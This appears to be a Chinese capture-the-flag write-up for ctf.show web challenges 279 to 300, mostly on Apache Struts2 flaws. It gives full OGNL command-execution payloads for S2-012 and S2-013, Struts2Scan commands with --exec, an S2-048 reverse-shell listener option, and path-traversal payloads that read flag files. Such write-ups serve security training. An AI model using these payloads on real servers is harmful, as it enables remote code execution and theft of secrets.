web279-web283
脚本一键利用 https://github.com/wyzmgmdg/Struts2Scan
web284
Struts-S2-012漏洞利用,参考文章构造 payload
。
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
web285
参考文章Struts-S2-013漏洞利用构造 payload
,或利用工具 Struts2-Scan 一键利用。
payload: /S2-013/link.action?url=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D
web286-web288
脚本,–exec 显示不完整就弹 shell。
web289
1 2
| $ python .\Struts2Scan.py -u http://6cc667dc-21e1-47f6-bc20-7c86de46d293.challenge.ctf.show/S2-029/default.action?message=aaaaa -n S2-032 --exec >> env
|
web290
1 2
| $ python .\Struts2Scan.py -u http://472b9395-a127-4f0b-9dbc-c9d19bf93912.challenge.ctf.show/S2-032/memoshow.action?id=3 -n S2-045 --exec >> env
|
web291
1 2
| $ python .\Struts2Scan.py -u http://b7828e36-6040-474a-8d74-5b2e47e9d225.challenge.ctf.show/S2-033/orders -n S2-045 --exec >> env
|
web292
1 2
| $ python .\Struts2Scan.py -u http://36034b6f-491f-4b59-8281-ede2349302ff.challenge.ctf.show/S2-037/orders -n S2-045 --exec >> env
|
web293
1 2
| $ python .\Struts2Scan.py -u http://474f4f6b-8ae7-42c0-bb45-9e1cf63bd17a.challenge.ctf.show/S2-045/orders -n S2-045 --exec >> env
|
web294
1 2
| $ python .\Struts2Scan.py -u http://79931272-f07a-41a3-8608-ec19106644c3.challenge.ctf.show/S2-046/doUpload.action -n S2-046 --exec >> env
|
提示不存在可忽略
web295
1
| $ python .\Struts2Scan.py -u http://d8a2ded0-0c5d-4a17-846a-5ae627dd1468.challenge.ctf.show/S2-048/integration/saveGangster.action -d "name={exp}&age=11111&description=aaaa" -n S2-048 -lr x.x.x.x:9999
|
web296
1 2
| $ python .\Struts2Scan.py -u http://770a3f17-692b-4558-aebe-838df182ff9c.challenge.ctf.show/S2-052/orders -n S2-045 --exec >> env
|
web297
1 2
| $ python .\Struts2Scan.py -u http://7545e434-5ce5-4cd7-8d62-2da3276d6cf3.challenge.ctf.show/S2-053/?name=VulApps -n S2-045 --exec >> env
|
web298
jadx 反编译给的 war 包里面的 class。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| package com.ctfshow.servlet;
import com.ctfshow.model.User; import com.ctfshow.util.Util; import java.io.IOException; import java.io.PrintWriter; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse;
public class loginServlet extends HttpServlet { private static final long serialVersionUID = -3044593499093610703L;
public void destroy() { loginServlet.super.destroy(); }
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); String username = request.getParameter("username"); User user = new User(username, request.getParameter("password")); if (username == "admin") { out.print("you are not admin"); } else if (user.getVipStatus()) { out.print("you are login"); out.print(Util.readFlag("/flag")); } else { out.print("login failed"); } out.flush(); out.close(); }
public void init() throws ServletException { } }
|
user model
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
| package com.ctfshow.model;
import java.io.Serializable;
public class User implements Serializable { private static final long serialVersionUID = -4069265999830231626L; private Boolean isVip; private String password; private String username;
public String getUsername() { return this.username; }
public void setUsername(String username2) { this.username = username2; }
public String getPassword() { return this.password; }
public void setPassword(String password2) { this.password = password2; }
public Boolean getIvVip() { return this.isVip; }
public void setIvVip(Boolean ivVip) { this.isVip = ivVip; }
public User(String username2, String password2) { this.username = username2; this.password = password2; }
public boolean getVipStatus() { if (!this.username.equals("admin") || !this.password.equals("ctfshow")) { return false; } return true; }
public String toString() { return "User [username=" + this.username + ", password=" + this.password + ", isVip=" + this.isVip + "]"; } }
|
根据源码构造 payload: /ctfshow/login?username=admin&password=ctfshow
web299
html 注释 /view-source?file=index.php
,读取 WEB-INF/web.xml 有 com.ctfshow.servlet.GetFlag,读 WEB-INF/classes/com/ctfshow/servlet/GetFlag.class 内有 flag 路径 /fl3g,读 ../../../../../../fl3g 得 flag。
尝试过读 class 下载进行反编译,无果。
payload: /view-source?file=../../../../../../fl3g
web300
同上题。
payload: /?file=../../../../../f1bg